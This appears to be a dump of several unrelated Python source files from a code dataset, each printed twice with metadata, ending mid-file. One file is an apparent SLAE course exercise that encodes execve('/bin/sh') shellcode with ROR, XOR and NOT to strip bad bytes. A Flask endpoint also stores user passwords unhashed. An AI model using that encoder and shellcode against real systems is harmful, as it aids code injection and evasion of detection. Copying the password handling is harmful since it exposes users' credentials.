self.channels = C = stem_out_channels
self.num_modules = N = num_modules_per_stack
self.num_labels = num_labels
self.stem = nn.Sequential(
nn.Conv2d(3, C, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(C)
)
layer_channels = [C] * N + [C * 2] + [C * 2] * N + [C * 4] + [C * 4] * N
layer_reductions = [False] * N + [True] + [False] * N + [True] + [False] * N
C_prev = C
self.cells = nn.ModuleList()
for C_curr, reduction in zip(layer_channels, layer_reductions):
if reduction:
cell = ResNetBasicblock(C_prev, C_curr, 2)
else:
ops: Dict[str, Callable[[int, int], nn.Module]] = {
prim: lambda C_in, C_out: OPS_WITH_STRIDE[prim](C_in, C_out, 1) for prim in PRIMITIVES
}
cell = NasBench201Cell(ops, C_prev, C_curr, label='cell')
self.cells.append(cell)
C_prev = C_curr
self.lastact = nn.Sequential(
nn.BatchNorm2d(C_prev),
nn.ReLU(inplace=True)
)
self.global_pooling = nn.AdaptiveAvgPool2d(1)
self.classifier = nn.Linear(C_prev, self.num_labels)
def forward(self, inputs):
feature = self.stem(inputs)
for cell in self.cells:
feature = cell(feature)
out = self.lastact(feature)
out = self.global_pooling(out)
out = out.view(out.size(0), -1)
logits = self.classifier(out)
return logits
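# A usage sketch (assumption: run under NNI's Retiarii tooling, since
# @model_wrapper and NasBench201Cell are mutation-aware; input shape follows
# the CIFAR-style 3x32x32 stem defined above):
#
#     net = NasBench201(stem_out_channels=16, num_modules_per_stack=5,
#                       num_labels=10)
#     logits = net(torch.randn(2, 3, 32, 32))   # -> shape (2, 10)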
| en | 0.783286 | # Copyright (c) Microsoft Corporation. # Licensed under the MIT license. # residual The full search space proposed by `NAS-Bench-201 <https://arxiv.org/abs/2001.00326>`__. It's a stack of :class:`NasBench201Cell`. | 1.929604 | 2 |
setup.py | Pasha13666/dialog_py | 1 | 10350 | #!/usr/bin/env python3
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='dialog_py',
version='1.0a1',
description='Python API for cdialog/linux dialog',
long_description=long_description,
url='https://github.com/pasha13666/dialog_py',
author='Pasha__kun',
author_email='<EMAIL>',
packages=['dialog_py'],
install_requires=[],
include_package_data=True,
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython'
]
)
| #!/usr/bin/env python3
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='dialog_py',
version='1.0a1',
description='Python API for cdialog/linux dialog',
long_description=long_description,
url='https://github.com/pasha13666/dialog_py',
author='Pasha__kun',
author_email='<EMAIL>',
packages=['dialog_py'],
install_requires=[],
include_package_data=True,
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython'
]
)
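# Illustrative developer install for this package (assumed workflow, not part of the original file):
#   pip install -e .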
| fr | 0.221828 | #!/usr/bin/env python3 | 1.173689 | 1 |
test/test_who.py | rliebz/whoswho | 28 | 10351 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import nose
from nose.tools import *
from whoswho import who, config
from nameparser.config.titles import TITLES as NAMEPARSER_TITLES
class TestMatch(unittest.TestCase):
def setUp(self):
self.name = '<NAME>'
def test_string(self):
# Only relevant for python 2.X
assert_true(who.match(self.name, str('<NAME>')))
def test_unicode(self):
name = self.name
assert_true(who.match(name, '<NAME>'))
assert_true(who.match(name, '<NAME>'))
assert_false(who.match(name, '<NAME>'))
def test_name_and_initials(self):
assert_true(who.match(self.name, '<NAME>'))
assert_true(who.match(self.name, '<NAME>'))
assert_true(who.match(self.name, '<NAME>'))
def test_different_number_initials(self):
assert_true(who.match(self.name, '<NAME>'))
assert_true(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_true(who.match('<NAME>', '<NAME>'))
def test_different_initials(self):
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
def test_short_names(self):
assert_true(who.match(self.name, '<NAME>'))
# TODO: Should these be true?
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
def test_suffixes(self):
name = '<NAME>'
assert_true(who.match(name, '<NAME>'))
assert_true(who.match(name, '<NAME>r'))
assert_true(who.match(name, '<NAME>, PhD'))
assert_false(who.match(name, '<NAME>, Sr'))
assert_false(who.match(name, '<NAME>, Sr, PhD'))
assert_true(who.match(name, '<NAME>, Jr, PhD'))
def test_equivalent_suffixes(self):
name = '<NAME>r'
assert_true(who.match(name, '<NAME> Jnr'))
assert_false(who.match(name, '<NAME> Snr'))
def test_titles(self):
name = 'Mr. <NAME>'
assert_true(who.match(name, '<NAME>'))
assert_true(who.match(name, 'Sir <NAME>'))
assert_true(who.match(name, 'Dr. <NAME>'))
assert_false(who.match(name, 'Mrs. <NAME>'))
def test_nickname(self):
name = 'Robert "<NAME>'
assert_true(who.match(name, '<NAME>'))
assert_true(who.match('<NAME>', name))
assert_false(who.match(name, '<NAME>'))
assert_false(who.match(name, '<NAME>'))
assert_false(who.match(name, '<NAME>',
options={'check_nickname': False}))
class TestRatio(unittest.TestCase):
def setUp(self):
self.name = '<NAME>'
def test_string(self):
# Only relevant for python 2.X
assert_equal(who.ratio(self.name, str('<NAME>')), 100)
def test_unicode(self):
name = self.name
assert_equal(who.ratio(name, 'attach<NAME>'), 100)
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_true(who.ratio(name, '<NAME>') < 100)
def test_name_and_initials(self):
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_equal(who.ratio(self.name, '<NAME>'), 100)
def test_different_number_initials(self):
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_equal(who.ratio('<NAME>', '<NAME>'), 100)
def test_different_initials(self):
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
def test_short_names(self):
assert_true(who.ratio(self.name, '<NAME>'))
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
def test_suffixes(self):
name = '<NAME>'
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_equal(who.ratio(name, '<NAME>r'), 100)
assert_equal(who.ratio(name, '<NAME>, PhD'), 100)
assert_false(who.ratio(name, '<NAME>, Sr'))
assert_false(who.ratio(name, '<NAME>, Sr, PhD'))
assert_equal(who.ratio(name, '<NAME>, Jr, PhD'), 100)
# Suffix doesn't change a match
assert_equal(who.ratio(name, '<NAME>, Jr'),
who.ratio(name, '<NAME>'))
def test_equivalent_suffixes(self):
name = '<NAME> Jr'
assert_equal(who.ratio(name, '<NAME> Jnr'), 100)
assert_false(who.ratio(name, '<NAME> Snr'))
def test_titles(self):
name = 'Mr. <NAME>'
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_equal(who.ratio(name, 'Sir <NAME>'), 100)
assert_equal(who.ratio(name, 'Dr. <NAME>'), 100)
assert_false(who.ratio(name, 'Mrs. <NAME>'))
# Title doesn't change a match
assert_equal(who.ratio(name, 'Dr. <NAME>'),
who.ratio(name, '<NAME>'))
def test_nickname(self):
name = 'Robert "Evan" Liebowitz'
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_equal(who.ratio('<NAME>', name), 100)
assert_true(who.ratio(name, '<NAME>') < 100)
assert_true(who.ratio(name, '<NAME>') < 100)
assert_true(who.ratio(name, '<NAME>',
options={'check_nickname': False}) < 100)
assert_true(who.ratio(name, '<NAME>') <
who.ratio(name, '<NAME>'))
assert_equal(who.ratio(name, '<NAME>ebowitz'),
who.ratio(name, '<NAME>', 'strict'))
# TODO: Should we ensure that the metadata is up to date?
@nottest
class TestConfig(unittest.TestCase):
def test_titles_all_defined(self):
"""
Check if list of titles is up to date with nameparser
"""
all_titles = (
config.MALE_TITLES |
config.FEMALE_TITLES |
config.GENDERLESS_TITLES
)
assert_equal(all_titles, NAMEPARSER_TITLES)
def test_suffixes_all_defined(self):
"""
Check if list of suffixes is up to date with nameparser
"""
from nameparser.config.suffixes import SUFFIX_ACRONYMS, SUFFIX_NOT_ACRONYMS
all_suffixes = (
config.UNIQUE_SUFFIXES |
config.MISC_SUFFIXES
)
nameparser_suffixes = (
SUFFIX_ACRONYMS |
SUFFIX_NOT_ACRONYMS
)
assert_equal(all_suffixes, nameparser_suffixes)
if __name__ == '__main__':
nose.main()
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import nose
from nose.tools import *
from whoswho import who, config
from nameparser.config.titles import TITLES as NAMEPARSER_TITLES
class TestMatch(unittest.TestCase):
def setUp(self):
self.name = '<NAME>'
def test_string(self):
# Only relevant for python 2.X
assert_true(who.match(self.name, str('<NAME>')))
def test_unicode(self):
name = self.name
assert_true(who.match(name, '<NAME>'))
assert_true(who.match(name, '<NAME>'))
assert_false(who.match(name, '<NAME>'))
def test_name_and_initials(self):
assert_true(who.match(self.name, '<NAME>'))
assert_true(who.match(self.name, '<NAME>'))
assert_true(who.match(self.name, '<NAME>'))
def test_different_number_initials(self):
assert_true(who.match(self.name, '<NAME>'))
assert_true(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_true(who.match('<NAME>', '<NAME>'))
def test_different_initials(self):
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
def test_short_names(self):
assert_true(who.match(self.name, '<NAME>'))
# TODO: Should these be true?
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
def test_suffixes(self):
name = '<NAME>'
assert_true(who.match(name, '<NAME>'))
assert_true(who.match(name, '<NAME>r'))
assert_true(who.match(name, '<NAME>, PhD'))
assert_false(who.match(name, '<NAME>, Sr'))
assert_false(who.match(name, '<NAME>, Sr, PhD'))
assert_true(who.match(name, '<NAME>, Jr, PhD'))
def test_equivalent_suffixes(self):
name = '<NAME>r'
assert_true(who.match(name, '<NAME> Jnr'))
assert_false(who.match(name, '<NAME> Snr'))
def test_titles(self):
name = 'Mr. <NAME>'
assert_true(who.match(name, '<NAME>'))
assert_true(who.match(name, 'Sir <NAME>'))
assert_true(who.match(name, 'Dr. <NAME>'))
assert_false(who.match(name, 'Mrs. <NAME>'))
def test_nickname(self):
name = 'Robert "<NAME>'
assert_true(who.match(name, '<NAME>'))
assert_true(who.match('<NAME>', name))
assert_false(who.match(name, '<NAME>'))
assert_false(who.match(name, '<NAME>'))
assert_false(who.match(name, '<NAME>',
options={'check_nickname': False}))
class TestRatio(unittest.TestCase):
def setUp(self):
self.name = '<NAME>'
def test_string(self):
# Only relevant for python 2.X
assert_equal(who.ratio(self.name, str('<NAME>')), 100)
def test_unicode(self):
name = self.name
assert_equal(who.ratio(name, 'attach<NAME>'), 100)
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_true(who.ratio(name, '<NAME>') < 100)
def test_name_and_initials(self):
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_equal(who.ratio(self.name, '<NAME>'), 100)
def test_different_number_initials(self):
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_equal(who.ratio('<NAME>', '<NAME>'), 100)
def test_different_initials(self):
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
def test_short_names(self):
assert_true(who.ratio(self.name, '<NAME>'))
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
def test_suffixes(self):
name = '<NAME>'
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_equal(who.ratio(name, '<NAME>r'), 100)
assert_equal(who.ratio(name, '<NAME>, PhD'), 100)
assert_false(who.ratio(name, '<NAME>, Sr'))
assert_false(who.ratio(name, '<NAME>, Sr, PhD'))
assert_equal(who.ratio(name, '<NAME>, Jr, PhD'), 100)
# Suffix doesn't change a match
assert_equal(who.ratio(name, '<NAME>, Jr'),
who.ratio(name, '<NAME>'))
def test_equivalent_suffixes(self):
name = '<NAME> Jr'
assert_equal(who.ratio(name, '<NAME> Jnr'), 100)
assert_false(who.ratio(name, '<NAME> Snr'))
def test_titles(self):
name = 'Mr. <NAME>'
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_equal(who.ratio(name, 'Sir <NAME>'), 100)
assert_equal(who.ratio(name, 'Dr. <NAME>'), 100)
assert_false(who.ratio(name, 'Mrs. <NAME>'))
# Title doesn't change a match
assert_equal(who.ratio(name, 'Dr. <NAME>'),
who.ratio(name, '<NAME>'))
def test_nickname(self):
name = 'Robert "Evan" Liebowitz'
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_equal(who.ratio('<NAME>', name), 100)
assert_true(who.ratio(name, '<NAME>') < 100)
assert_true(who.ratio(name, '<NAME>') < 100)
assert_true(who.ratio(name, '<NAME>',
options={'check_nickname': False}) < 100)
assert_true(who.ratio(name, '<NAME>') <
who.ratio(name, '<NAME>'))
assert_equal(who.ratio(name, '<NAME>ebowitz'),
who.ratio(name, '<NAME>', 'strict'))
# TODO: Should we ensure that the metadata is up to date?
@nottest
class TestConfig(unittest.TestCase):
def test_titles_all_defined(self):
"""
Check if list of titles is up to date with nameparser
"""
all_titles = (
config.MALE_TITLES |
config.FEMALE_TITLES |
config.GENDERLESS_TITLES
)
assert_equal(all_titles, NAMEPARSER_TITLES)
def test_suffixes_all_defined(self):
"""
Check if list of suffixes is up to date with nameparser
"""
from nameparser.config.suffixes import SUFFIX_ACRONYMS, SUFFIX_NOT_ACRONYMS
all_suffixes = (
config.UNIQUE_SUFFIXES |
config.MISC_SUFFIXES
)
nameparser_suffixes = (
SUFFIX_ACRONYMS |
SUFFIX_NOT_ACRONYMS
)
assert_equal(all_suffixes, nameparser_suffixes)
if __name__ == '__main__':
nose.main()
| en | 0.824139 | # -*- coding: utf-8 -*- # Only relevant for python 2.X # TODO: Should these be true? # Only relevant for python 2.X # Suffix doesn't change a match # Title doesn't change a match # TODO: Should we ensure that the metadata is up to date? Check if list of titles is up to date with nameparser Check if list of suffixes is up to date with nameparser | 2.749582 | 3 |
endpoints/UserEndpoint.py | GardenersGalore/server | 0 | 10352 | import json
from flask import request
from flask_restful import Resource, abort, reqparse
from models.User import User
"""
POST Creates a new resource.
GET Retrieves a resource.
PUT Updates an existing resource.
DELETE Deletes a resource.
"""
class UserEndpoint(Resource):
def post(self):
j = request.get_json()
# need to ensure the required fields are in the json
if "name" not in j:
abort(422, message="name is not in json body")
else:
name = j["name"]
if "username" not in j:
abort(422, message="username not in json body")
else:
username = j["username"]
if "email" not in j:
abort(422, message="email not in json body")
else:
email = j["email"]
if "password" not in j:
abort(422, message="password not in json body")
else:
password = j["password"]
user_obj = User(
name=name,
username=username,
email=email,
password=password,
)
if "phone_number" in j:
user_obj.phone_number = j["phone_number"]
if "experience" in j:
user_obj.experience = j["experience"]
if "pictureURL" in j:
user_obj.pictureURL = j["pictureURL"]
d = user_obj.save()
return json.loads(d.to_json())
def put(self):
# TODO
pass
def delete(self):
# TODO
pass
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('username', required=True, type=str, help='The username of the User')
args = parser.parse_args()
try:
user = json.loads(User.objects.get(username=args['username']).to_json())
except Exception as e:
print(e)
abort(404, message="User doesnt exist: {} doesn't exist".format(args['username']))
return user
| import json
from flask import request
from flask_restful import Resource, abort, reqparse
from models.User import User
"""
POST Creates a new resource.
GET Retrieves a resource.
PUT Updates an existing resource.
DELETE Deletes a resource.
"""
class UserEndpoint(Resource):
def post(self):
j = request.get_json()
# need to ensure the required fields are in the json
if "name" not in j:
abort(422, message="name is not in json body")
else:
name = j["name"]
if "username" not in j:
abort(422, message="username not in json body")
else:
username = j["username"]
if "email" not in j:
abort(422, message="email not in json body")
else:
email = j["email"]
if "password" not in j:
abort(422, message="password not in json body")
else:
password = j["password"]
user_obj = User(
name=name,
username=username,
email=email,
password=password,
)
if "phone_number" in j:
user_obj.phone_number = j["phone_number"]
if "experience" in j:
user_obj.experience = j["experience"]
if "pictureURL" in j:
user_obj.pictureURL = j["pictureURL"]
d = user_obj.save()
return json.loads(d.to_json())
def put(self):
# TODO
pass
def delete(self):
# TODO
pass
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('username', required=True, type=str, help='The username of the User')
args = parser.parse_args()
try:
user = json.loads(User.objects.get(username=args['username']).to_json())
except Exception as e:
print(e)
abort(404, message="User doesnt exist: {} doesn't exist".format(args['username']))
return user
| en | 0.792861 | POST Creates a new resource. GET Retrieves a resource. PUT Updates an existing resource. DELETE Deletes a resource. # need to ensure the required fields are in the json # TODO # TODO | 3.0881 | 3 |
passy_forms/forms/forms.py | vleon1/passy | 0 | 10353 | <reponame>vleon1/passy
from django.forms import forms
class Form(forms.Form):
def get_value(self, name):
self.is_valid() # making sure we tried to clean the data before accessing it
if self.is_bound and name in self.cleaned_data:
return self.cleaned_data[name]
field = self[name]
return field.value() or ""
def to_dict(self):
return {name: self.get_value(name) for name in self.fields}
| from django.forms import forms
class Form(forms.Form):
def get_value(self, name):
self.is_valid() # making sure we tried to clean the data before accessing it
if self.is_bound and name in self.cleaned_data:
return self.cleaned_data[name]
field = self[name]
return field.value() or ""
def to_dict(self):
return {name: self.get_value(name) for name in self.fields} | en | 0.938686 | # making sure we tried to clean the data before accessing it | 2.848369 | 3 |
assignment4/rorxornotencode.py | gkweb76/SLAE | 15 | 10354 | <filename>assignment4/rorxornotencode.py<gh_stars>10-100
#!/usr/bin/python
# Title: ROR/XOR/NOT encoder
# File: rorxornotencode.py
# Author: <NAME>
# SLAE-681
import sys
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
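# Each shellcode byte is encoded below as NOT(ROR(byte, 7) XOR 0xAA); a decoder stub
# must undo this in reverse: NOT, then XOR 0xAA, then ROL 7 (equivalent to ROR 1).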
shellcode = (
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = ""
encoded2 = ""
print "[*] Encoding shellcode..."
for x in bytearray(shellcode):
# ROR & XOR encoding
z = ror(x, 7, 8)^0xAA
# NOT encoding
y = ~z
if str('%02x' % (y & 0xff)).upper() == "00":
print ">>>>>>>>>> NULL detected in shellcode, aborting."
sys.exit()
if str('%02x' % (y & 0xff)).upper() == "0A":
print ">>>>>>>>>> \\xOA detected in shellcode."
if str('%02x' % (y & 0xff)).upper() == "0D":
print ">>>>>>>>>>> \\x0D detected in shellcode."
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' %(y & 0xff)
print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)
| <filename>assignment4/rorxornotencode.py<gh_stars>10-100
#!/usr/bin/python
# Title: ROR/XOR/NOT encoder
# File: rorxornotencode.py
# Author: <NAME>
# SLAE-681
import sys
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
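# Each shellcode byte is encoded below as NOT(ROR(byte, 7) XOR 0xAA); a decoder stub
# must undo this in reverse: NOT, then XOR 0xAA, then ROL 7 (equivalent to ROR 1).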
shellcode = (
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = ""
encoded2 = ""
print "[*] Encoding shellcode..."
for x in bytearray(shellcode):
# ROR & XOR encoding
z = ror(x, 7, 8)^0xAA
# NOT encoding
y = ~z
if str('%02x' % (y & 0xff)).upper() == "00":
print ">>>>>>>>>> NULL detected in shellcode, aborting."
sys.exit()
if str('%02x' % (y & 0xff)).upper() == "0A":
print ">>>>>>>>>> \\xOA detected in shellcode."
if str('%02x' % (y & 0xff)).upper() == "0D":
print ">>>>>>>>>>> \\x0D detected in shellcode."
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' %(y & 0xff)
print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)
| en | 0.258869 | #!/usr/bin/python # Title: ROR/XOR/NOT encoder # File: rorxornotencode.py # Author: <NAME> # SLAE-681 # ROR & XOR encoding # NOT encoding | 2.582449 | 3 |
authalligator_client/entities.py | closeio/authalligator-client | 0 | 10355 | import datetime
from enum import Enum
from typing import Any, Callable, Dict, List, Optional, Type, TypeVar, Union, cast
import attr
import ciso8601
import structlog
from attr import converters
from . import enums
from .utils import as_json_dict, to_snake_case
logger = structlog.get_logger()
class Omitted(Enum):
"""Singleton written in a way mypy can parse.
See https://www.python.org/dev/peps/pep-0484/#support-for-singleton-types-in-unions
for more details.
"""
token = 0
OMITTED = Omitted.token
"""A singleton to differentiate between omitted vs explicit :obj:`None`."""
# helper type for entity_converter
U = TypeVar("U", bound="BaseAAEntity")
def entity_converter(
entity_cls, # type: Union[List[Type[U]], Type[U]]
):
# type: (...) -> Callable[[Union[Omitted, U, Dict]], Union[U, Omitted]]
"""
Convert a dictionary response into instances of the entity class.
Usage:
# disambiguates between type_a and type_b based on ``__typename``
converter = entity_converter([TypeA, TypeB])
my_instance = converter({'__typename': 'TypeB'})
XXX: mypy isn't expressive enough to annotate that the return type will be
one of the _specific_ arg types and not the most generic bound base. We'll
unfortunately have to ``# type: ignore`` on lines that call this.
Args:
entity_cls: the class (or classes) the value should be converted into.
If multiple classes are provided as options, ``__typename`` must be
            included in the response to support disambiguation.
Returns:
A callable that will convert a dictionary to the right entity type. If
more than one entity type is possible, that dictionary must have a
``__typename`` field present, which must match the ``TYPENAME`` on a
        provided entity. If none of the provided types match or if the fields
don't align with the provided entity, a ``TypeError`` is raised.
"""
entity_classes = [] # type: List[Type[U]]
if isinstance(entity_cls, (list, tuple)):
entity_classes = entity_cls
else:
entity_classes = [entity_cls]
def _entity_converter(val):
# type: (Union[Dict[str, Any], U, Omitted]) -> Union[U, Omitted]
        # check if it's explicitly been omitted (don't try to convert those)
if val is OMITTED:
return val
# check if it's already an entity
if any([isinstance(val, e_cls) for e_cls in entity_classes]):
return cast(U, val)
# definitely a dict now, since we check what it was earlier. (present
# for type checking)
val = cast(Dict[str, Any], val)
# if there's more than one possibility for entity classes, pick the
# right one based on ``__typename``
if len(entity_classes) == 1:
# only one option, we don't need an explicit type
selected_cls = entity_classes[0] # type: Type[U]
else:
# a few different return types are expected
typename = val.pop("__typename", None)
if typename is None:
type_options = ", ".join([e.TYPENAME for e in entity_classes])
raise TypeError(
'No "__typename" present to disambiguate between possible '
"types: [{}]".format(type_options)
)
matching_typename = next(
(e for e in entity_classes if e.TYPENAME == typename), None
) # type: Optional[Type[U]]
if matching_typename is None:
raise TypeError('No entity found for type "{}"'.format(typename))
selected_cls = matching_typename
return selected_cls.from_api_response(val)
return _entity_converter
@attr.attrs(frozen=True)
class BaseAAEntity(object):
TYPENAME = "" # type: str
"""The name of the graphql type in the schema.
Used for disambiguation when there's more than one possible type being
returned.
"""
as_dict = as_json_dict
@classmethod
def from_api_response(cls, data):
# type: (Type[U], Dict[str, Any]) -> U
# If __typename is present, this asserts that it matches this class's
# expected typename
typename = data.pop("__typename", None)
if typename and typename != cls.TYPENAME:
raise TypeError(
(
"Given type \"{}\" doesn't match this entity's type: "
'"{}". Is {} the right entity for '
"this data?"
).format(typename, cls.TYPENAME, cls.__name__)
)
# convert top-level kwargs from camelCase to snake_case
kwargs = {to_snake_case(k): v for k, v in data.items()}
# mypy doesn't like that we're providing kwargs to a type whose init
# doesn't accept any kwargs (even though subclasses do have attributes)
return cls(**kwargs) # type: ignore
@attr.attrs(frozen=True)
class AccountError(BaseAAEntity):
TYPENAME = "AccountError"
code = attr.attrib(converter=enums.AccountErrorCode) # type: enums.AccountErrorCode
message = attr.attrib() # type: Optional[str]
retry_in = attr.attrib() # type: Optional[int]
@attr.attrs(frozen=True)
class Account(BaseAAEntity):
TYPENAME = "Account"
provider = attr.attrib(converter=enums.ProviderType) # type: enums.ProviderType
username = attr.attrib() # type: str
access_token = attr.attrib() # type: Optional[str]
access_token_expires_at = attr.attrib(
converter=converters.optional(ciso8601.parse_datetime),
) # type: Optional[datetime.datetime]
@attr.attrs(frozen=True)
class DeleteOperation(BaseAAEntity):
"""Base class for delete operation payloads.
These payloads don't actually have any field information in them. While
there's technically a "_" field in the schema, it's only a placeholder to
work around the language not supporting empty responses. It has no meaning
and will never have a meaningful value.
This class has no specific equivalent type, it's just a convenience type
for these entities.
"""
pass
@attr.attrs(frozen=True)
class DeleteOtherAccountKeysPayload(DeleteOperation):
TYPENAME = "DeleteOtherAccountKeysPayload"
@attr.attrs(frozen=True)
class DeleteAccountKeyPayload(DeleteOperation):
TYPENAME = "DeleteAccountKeyPayload"
@attr.attrs(frozen=True)
class DeleteAccountPayload(DeleteOperation):
TYPENAME = "DeleteAccountPayload"
@attr.attrs(frozen=True)
class AuthorizeAccountPayload(BaseAAEntity):
TYPENAME = "AuthorizeAccountPayload"
account = attr.attrib(
converter=entity_converter(Account), # type: ignore[misc]
) # type: Account
account_key = attr.attrib() # type: str
number_of_account_keys = attr.attrib() # type: int
@attr.attrs(frozen=True)
class VerifyAccountPayload(BaseAAEntity):
TYPENAME = "VerifyAccountPayload"
account = attr.attrib(
converter=entity_converter(Account), # type: ignore[misc]
) # type: Account
@attr.attrs(frozen=True)
class Query(BaseAAEntity):
account = attr.attrib(
default=OMITTED,
converter=entity_converter([Account, AccountError]), # type: ignore[misc]
) # type: Union[Omitted, Account, AccountError]
@attr.attrs(frozen=True)
class Mutation(BaseAAEntity):
    # mypy and the attrs plugin doesn't like the `Omitted` default + converter
# stuff
authorize_account = attr.attrib( # type: ignore
default=OMITTED,
        # ignore unsupported converter warning
converter=cast( # type: ignore[misc]
Union[Omitted, AuthorizeAccountPayload, AccountError],
entity_converter([AuthorizeAccountPayload, AccountError]),
),
) # type: Union[Omitted, AuthorizeAccountPayload, AccountError]
verify_account = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, VerifyAccountPayload, AccountError],
entity_converter([VerifyAccountPayload, AccountError]),
),
) # type: Union[Omitted, VerifyAccountPayload, AccountError]
delete_account = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteAccountPayload, AccountError],
entity_converter([DeleteAccountPayload, AccountError]),
),
) # type: Union[Omitted, DeleteAccountPayload, AccountError]
delete_account_key = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteAccountKeyPayload, AccountError],
entity_converter([DeleteAccountKeyPayload, AccountError]),
),
) # type: Union[Omitted, DeleteAccountKeyPayload, AccountError]
delete_other_account_keys = attr.attrib( # type: ignore
default=OMITTED,
        # ignore unsupported converter warning
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteOtherAccountKeysPayload, AccountError],
entity_converter([DeleteOtherAccountKeysPayload, AccountError]),
),
) # type: Union[Omitted, DeleteOtherAccountKeysPayload, AccountError]
| import datetime
from enum import Enum
from typing import Any, Callable, Dict, List, Optional, Type, TypeVar, Union, cast
import attr
import ciso8601
import structlog
from attr import converters
from . import enums
